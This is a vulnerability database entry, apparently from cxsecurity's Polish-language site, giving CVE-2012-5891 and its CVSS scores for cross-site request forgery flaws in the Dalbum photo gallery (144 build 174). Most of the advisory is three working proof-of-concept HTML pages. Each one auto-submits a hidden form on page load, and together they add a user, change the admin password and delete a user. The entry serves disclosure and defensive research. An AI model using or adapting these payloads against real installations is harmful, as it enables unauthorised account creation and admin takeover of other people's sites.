Index
Bugtraq
Pełna lista
Błędy
Sztuczki
Exploity
Dorks list
Tylko z CVE
Tylko z CWE
Bogus
Ranking
CVEMAP
Świeża lista CVE
Producenci
Produkty
Słownik CWE
Sprawdź nr. CVE
Sprawdź nr. CWE
Szukaj
W Bugtraq
W bazie CVE
Po autorze
Po nr. CVE
Po nr. CWE
Po producencie
Po produkcie
RSS
Bugtraq
CVEMAP
CVE Produkty
Tylko Błędy
Tylko Exploity
Tylko Dorks
Więcej
cIFrex
Facebook
Twitter
Donate
O bazie
Lang
Polish
English
Submit
Dalbum 144 Build 174 Cross Site Request Forgery
2012-04-01 / 2012-11-18
Credit:
Ahmed Elhady Mohamed
Risk:
Low
Local:
No
Remote:
Yes
CVE:
CVE-2012-5891
CWE:
CWE-352
Ogólna skala CVSS:
6.8/10
Znaczenie:
6.4/10
Łatwość wykorzystania:
8.6/10
Wymagany dostęp:
Zdalny
Złożoność ataku:
Średnia
Autoryzacja:
Nie wymagana
Wpływ na poufność:
Częściowy
Wpływ na integralność:
Częściowy
Wpływ na dostępność:
Częściowy
dalbum 144 build 174 and earlier CSRF Vulnerabilities =================================================================================== # Exploit Title:dalbum 144_174 and earlier CSRF Vulnerabilities # Vendor: http://www.dalbum.org/ # Download link :http://www.dalbum.org/index.php?go=Downloads # Author: Ahmed Elhady Mohamed # Email : ahmed.elhady.mohamed@gmail.com # version: 144 build 174 # Category: webapps # Tested on: ubuntu 11.4 # This vulnerability allows a malicious hacker to add a user delete a user and change password of a user =================================================================================== CSRF VUlnerabilities : POC 1: <html> <head> <title> Add a user </title> <script> function CSRF() { document.getElementById('CSRF').click(); }; </script> </head> <body onLoad="CSRF()"> <form action="http://127.0.0.1/photo/pass.php" method="post" /> <input name="user" value="CSRF" type="hidden" /> <input name="pass" value="123" type="hidden" /> <input name="passc" value="123" type="hidden" /> <input type="hidden" name="action" value="add"> <input type="submit" id="CSRF" name="submit" value="Submit"> </form> </body> </html> POC 2: <html> <head> <title> Change user's password </title> <script> function CSRF() { document.getElementById('CSRF').click(); }; </script> </head> <body onLoad="CSRF()"> <form action="http://127.0.0.1/photo/pass.php" method="post" /> <input name="user" value="admin" type="hidden" /> <input name="pass" value="111" type="hidden" /> <input name="passc" value="111" type="hidden" /> <input name="change" value="Change password" type="hidden" /> <input type="hidden" name="action" value="change"> <input type="submit" id="CSRF" name="submit" value="Submit"> </form> </body> </html> POC 3: <html> <head> <title> Delete a user </title> <script> function CSRF() { document.getElementById('CSRF').click(); }; </script> </head> <body onLoad="CSRF()"> <form action="http://127.0.0.1/photo/pass.php" method="post" /> <input name="user" value="a" type="hidden" /> <input type="hidden" name="delete" value="Delete"> <input type="submit" id="CSRF" name="submit" value="Submit"> </form> </body> </html>
Referencje:
http://www.dalbum.org/
http://www.dalbum.org/index.php?go=Downloads
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top